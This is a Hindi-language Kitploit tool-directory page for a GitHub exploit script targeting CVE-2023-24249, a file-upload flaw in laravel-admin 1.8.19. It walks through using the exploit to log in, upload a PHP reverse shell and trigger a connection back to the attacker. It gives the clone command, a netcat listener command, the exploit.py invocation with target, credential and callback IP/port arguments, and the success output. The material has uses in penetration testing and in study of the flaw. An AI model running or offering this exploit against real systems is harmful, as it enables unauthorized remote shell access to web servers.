Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-24249-Exploit — CVE-2023-24249 के लिए शोषण स्क्रिप्ट - एक भेद्यता जो फ़ाइल अपलोड और कमांड इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/iduzzel/cve-2023-24249-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

CVE-2023-24249 के लिए शोषण स्क्रिप्ट - एक भेद्यता जो फ़ाइल अपलोड और कमांड इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
91122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-24249 एक्सप्लॉइट स्क्रिप्ट

विवरण

इस रिपॉजिटरी में CVE-2023-24249 के लिए एक एक्सप्लॉइट स्क्रिप्ट है, जो laravel-admin संस्करण 1.8.19 में पाई गई एक गंभीर कमजोरी है। यह कमजोरी मनमानी फ़ाइल अपलोड की अनुमति देती है, जिससे हमलावर एक क्राफ्ट किए गए PHP फ़ाइल के माध्यम से मनमाना कोड निष्पादित कर सकते हैं। यह एक्सप्लॉइट दर्शाता है कि कैसे एक हमलावर लक्ष्य एप्लिकेशन पर एक रिवर्स शेल अपलोड कर सकता है और उसे निष्पादित करके रिमोट एक्सेस प्राप्त कर सकता है।

कमजोरी का विवरण

CVE-2023-24249 laravel-admin v1.8.19 में एक मनमानी फ़ाइल अपलोड कमजोरी है। यह कमजोरी हमलावरों को मनमानी PHP फ़ाइलों को अपलोड और निष्पादित करने की अनुमति देती है, जिससे संभावित रिमोट कोड निष्पादन हो सकता है।

  • आधार स्कोर: 7.2 उच्च
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • कमजोरी गणना: CWE-434 - खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड

संदर्भ

  • एक्सप्लॉइट - तृतीय पक्ष सलाह
  • लारावेल एडमिन GitHub रिपॉजिटरी
  • लारावेल एडमिन आधिकारिक वेबसाइट
  • एक्सप्लॉइट स्क्रिप्ट

    प्रदान की गई एक्सप्लॉइट स्क्रिप्ट CVE-2023-24249 के शोषण की प्रक्रिया को स्वचालित करती है। यह निम्नलिखित चरण करती है:

    1. प्रमाणीकरण: प्रदान किए गए क्रेडेंशियल्स का उपयोग करके लक्ष्य एप्लिकेशन में लॉग इन करती है।
    2. रिवर्स शेल अपलोड करें: कमजोर फ़ाइल अपलोड कार्यक्षमता के माध्यम से एक PHP रिवर्स शेल स्क्रिप्ट अपलोड करती है।
    3. रिवर्स शेल निष्पादित करें: अपलोड की गई रिवर्स शेल स्क्रिप्ट पर GET अनुरोध भेजती है ताकि वह निष्पादित हो और हमलावर की मशीन पर वापस कनेक्शन स्थापित करे।

    आवश्यकताएँ

    • Python 3
    • requests लाइब्रेरी
    • beautifulsoup4 लाइब्रेरी

    आवश्यक लाइब्रेरीज़ को pip का उपयोग करके इंस्टॉल करें:

    root@kitploit:~
    pip install requests beautifulsoup4
    

    उपयोग

    1. रिपॉजिटरी क्लोन करें:

      root@kitploit:~
      git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
      cd CVE-2023-24249-Exploit
      
    2. अपनी मशीन पर एक लिसनर शुरू करें:

      root@kitploit:~
      nc -lvnp <PORT>
      
    3. एक्सप्लॉइट स्क्रिप्ट चलाएँ:

      root@kitploit:~
      python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
      

      <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP>, और <YOUR_PORT> को उपयुक्त मानों से बदलें:

      • <TARGET_URL>: लक्ष्य एप्लिकेशन का URL।
      • <USERNAME>: प्रमाणीकरण के लिए उपयोगकर्ता नाम।
      • <PASSWORD>: प्रमाणीकरण के लिए पासवर्ड।
      • <YOUR_IP>: रिवर्स शेल कनेक्शन प्राप्त करने के लिए आपका IP पता।
      • <YOUR_PORT>: वह पोर्ट जिस पर आपका लिसनर चल रहा है।

    उदाहरण

    root@kitploit:~
    python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
    

    स्क्रिप्ट आउटपुट

    यदि एक्सप्लॉइट सफल होता है, तो स्क्रिप्ट आउटपुट देगी:

    root@kitploit:~
    [+] Reverse shell uploaded successfully! Attempting to execute it...
    [+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
    

    अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना किसी भी सिस्टम के विरुद्ध इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

    टूल डाउनलोड करें